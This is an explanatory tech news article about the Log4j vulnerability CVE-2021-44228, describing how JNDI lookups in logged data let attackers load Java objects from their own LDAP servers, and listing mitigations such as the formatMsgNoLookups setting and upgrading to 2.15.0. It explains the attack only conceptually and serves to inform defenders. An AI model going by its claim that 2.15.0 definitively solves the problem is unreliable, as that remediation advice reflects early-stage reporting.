Log4j: how the bug that makes the internet shake works

News of the Log4j bug started circulating on the Internet as early as December 9, initially as a vulnerability of Minecraft servers. In a short time, however, we realized the power of the bug and the extent of the spread that caused the risk level to rise to 10 (on a scale of 1 to 10). In fact, the Java Log4j library is widely spread across many platforms and web servers around the world.

Probably after Heartbleed and ShellShock it could be the most dangerous vulnerability currently present, so much so that the Apache Software Foundation itself has tried to remedy it by releasing a patch that can solve the problem. The vulnerability known as CVE-2021-44228 affects version 2 of the library and has been patched with release 2.15.0 .

log4j internet bug

What is Log4j and where is it used

Log4j is one of the most used logging libraries in Java and is extremely useful and widespread. At the origin of the vulnerability there is a feature introduced in Log4j in 2013: the JNDI lookup plugin. Before understanding how the bug works it is necessary to take a step back and analyze the purpose of the library and JNDI. Java Naming and Directory Interface has been present in Java since the 90s and is a service that allows you to find data (Java objects) through the folder structure. Directory services can be varied from CORBA COS (Common Object Service) to Java RMI (Remote Method Interface) Registry up to LDAP, the service used in the CVE.

The power of this bug lies in the fact that it can also be exploited by systems not directly exposed to the Internet. In fact, some information (such as the User-Agent or the username) are typically also logged in the backend systems that can be written in Java. If you can get this corrupt data from the frontend to the backend you can take over systems with relative ease.

Log4j: how the bug works

The JDNI LDAP lookup service allows you to retrieve objects through URLs of the type ldap: // localhost: 389 / o = JavaObject . However, it is also possible to pass structures of the type $ {prefix: name} and perform a JDNI lookup on any server on the Internet contained in name . From here we understand the type of vulnerability, classified as Remote Code Execution (RCE). In fact, by properly passing this field it is possible to load a Java object from a server under the control of the attackers .

log4j internet bug

Proof of Concepts (POC) are already available on the web and there are many news reports reporting massive scanning campaigns in search of this vulnerability.

Impacts and possible remedies

The impact of this attack is enormous to say the least considering the spread of Java in the world and among companies. Many are running for cover with major patching campaigns on their servers. In fact, versions of Log4j since 2.10 can be easily corrected by setting the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true .

Where possible, it is also possible to update the library to version 2.15.0 which definitively solves the problem and secures the applications. Versions from 2.0 to 2.10 instead need to remove the JndiLookup class to be safe.

Some researchers report that the resolution of this vulnerability could go on for months, if not years, given the huge popularity of the library. Of course, your best bet is to follow the directions from the Apache Software Foundation as soon as possible and make sure you have your systems up to date.

Article Log4j: How the Internet Shaking Bug Works Comes from Tech CuE | Close-up Engineering .